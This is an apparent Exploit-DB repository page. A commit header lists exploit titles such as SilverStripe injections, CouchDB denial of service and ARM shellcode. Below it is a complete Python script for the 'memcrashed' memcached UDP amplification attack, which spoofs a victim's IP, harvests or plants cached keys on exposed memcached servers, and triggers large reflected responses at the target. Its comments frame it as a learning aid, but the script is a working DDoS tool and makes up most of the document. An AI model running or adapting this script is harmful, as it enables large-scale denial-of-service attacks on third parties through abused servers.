ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
90 lines
No EOL
3.1 KiB
Python
Executable file
90 lines
No EOL
3.1 KiB
Python
Executable file
# Written by Alex Conrey
|
|
# Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44254.zip
|
|
#
|
|
# This program is free software: you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation, either version 3 of the License, or
|
|
# (at your option) any later version.
|
|
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
# GNU General Public License for more details.
|
|
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
#
|
|
# This was created to better understand the memcrashed exploit
|
|
# brought to light thanks to CloudFlare.
|
|
# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
|
|
#
|
|
# Please sysadmin responsibly.
|
|
|
|
import requests
|
|
import memcache
|
|
import re
|
|
|
|
from scapy.all import *
|
|
|
|
# Vulnerable memcached server list
|
|
SERVER_LIST = [
|
|
'172.17.0.2:11211',
|
|
]
|
|
|
|
# Destination
|
|
TARGET = '1.2.3.4'
|
|
|
|
# optional payload to set if no keys exist
|
|
payload = requests.get('https://google.com').text
|
|
payload_key = 'fuckit'
|
|
|
|
# this forces payload to load into memory for being extra-evil and efficient
|
|
if not payload:
|
|
print 'Could not import payload, continuing anyway'
|
|
|
|
try:
|
|
for server in SERVER_LIST:
|
|
if ':' in server:
|
|
server = server.split(':')[0]
|
|
|
|
ip = IP(src=TARGET, dst=server)
|
|
packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'
|
|
|
|
# fetch known keys by id
|
|
statitems_packet = packet_base.format('stats items')
|
|
udp = UDP(sport=50000, dport=11211)/statitems_packet
|
|
keyids = []
|
|
resp = sr1(ip/udp)
|
|
for key in str(resp.payload).split('\r\n'):
|
|
# Skip first line which has hex in it (I'm lazy)
|
|
if 'age' in key:
|
|
key = key.split(':')[1]
|
|
keyids.append(key)
|
|
|
|
# fetch names for keys by id
|
|
keys = []
|
|
for kid in keyids:
|
|
query = 'stats cachedump {0} 100'.format(kid)
|
|
keyid_packet = packet_base.format(query)
|
|
udp = UDP(sport=50000, dport=11211)/keyid_packet
|
|
resp = str(sr1(ip/udp).payload).split('\r\n')
|
|
for key in resp:
|
|
if 'ITEM' in key:
|
|
res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
|
|
keys.append(res.group('keyname'))
|
|
|
|
# if keys not present on target, make one
|
|
if not keys:
|
|
mc = memcache.Client([server],debug=False)
|
|
mc.set(payload_key, payload)
|
|
keys.append(payload_key)
|
|
|
|
# iterate thru known keys and blast away
|
|
for key in keys:
|
|
query = 'get {0}'.format(key)
|
|
fun_packet = packet_base.format(query)
|
|
udp = UDP(sport=50000, dport=11211)/fun_packet
|
|
sr1(ip/udp)
|
|
|
|
except Exception:
|
|
raise |